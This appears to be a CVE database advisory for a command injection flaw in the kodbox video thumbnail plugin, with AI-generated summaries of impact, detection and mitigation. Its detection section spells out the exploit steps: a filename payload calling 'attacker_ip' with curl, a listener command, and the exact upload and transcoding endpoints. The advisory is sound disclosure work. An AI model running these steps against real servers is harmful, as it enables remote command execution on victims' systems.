CVE-2026-2560
Received Received - Intake
OS Command Injection in kalcaddle kodbox Media File Preview Plugin

Publication date: 2026-02-16

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability has been found in kalcaddle kodbox up to 1.64.05. The impacted element is the function run of the file plugins/fileThumb/lib/VideoResize.class.php of the component Media File Preview Plugin. Such manipulation of the argument localFile leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-02-16
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-02-16
EPSS Evaluated
2026-06-14
NVD
CVE-2026-2560
EUVD
EUVD-2026-6080
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
kalcaddle kodbok to 1.64.05 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-2560 is a command injection vulnerability in the Media File Preview Plugin of kalcaddle kodbox versions up to 1.64.05. It occurs in the run() function of the file VideoResize.class.php, where a user-controlled variable named localFile is directly concatenated into a shell command string used to execute ffmpeg for video transcoding.

Because the localFile argument is not properly sanitized, an attacker can embed shell metacharacters in a crafted video filename. This allows arbitrary operating system commands to be executed on the server with the privileges of the web server process when the transcoding process is triggered.

The attack requires an authenticated user to upload a specially named video file, which then triggers the command injection during processing. The vulnerability is remotely exploitable and has a publicly available proof-of-concept exploit.

Impact Analysis

This vulnerability allows an attacker to execute arbitrary operating system commands on the affected server with the privileges of the web server process.

The impact includes potential compromise of confidentiality, integrity, and availability of the system. An attacker could use this to gain unauthorized access, manipulate or destroy data, or disrupt services.

Since the exploit can be triggered remotely by uploading a crafted video file, it poses a significant security risk to any system running the vulnerable version of kalcaddle kodbox with the Media File Preview Plugin enabled.

Compliance Impact

I don't know

Detection Guidance

This vulnerability can be detected by verifying if the vulnerable version of kalcaddle kodbox (up to 1.64.05) with the Media File Preview Plugin is in use, specifically checking for the presence of the file plugins/fileThumb/lib/VideoResize.class.php.

One detection method involves attempting to trigger the vulnerability by uploading a video file with a crafted filename containing shell metacharacters and then sending a GET request to the transcoding endpoint to observe if arbitrary commands execute.

A practical detection approach includes monitoring network traffic for unusual outbound connections initiated by the server during video transcoding, such as unexpected HTTP requests to attacker-controlled servers.

  • Start a listener on an attacker-controlled server (e.g., using: python3 -m http.server 80).
  • Upload a video file renamed to include a command injection payload, for example: video`curl attacker_ip`.mp4.
  • Retrieve the uploaded file path from the upload API response at /?explorer/upload/fileUpload.
  • Trigger the transcoding process by sending a GET request to /?plugin/fileThumb/videoSmall&noOutput=1&path={uploaded_file_path}.

If the attacker-controlled server receives a connection, it confirms the presence of the vulnerability and successful command injection.

Mitigation Strategies

No known mitigations or countermeasures have been published by the vendor for this vulnerability.

The recommended immediate step is to replace or upgrade the affected component (kalcaddle kodbox Media File Preview Plugin) to a version that is not vulnerable or to an alternative product.

As a temporary measure, restrict access to the vulnerable plugin or disable the Media File Preview Plugin to prevent exploitation.

Monitor your system for suspicious activity, especially unexpected outbound connections during video processing.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-2560. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart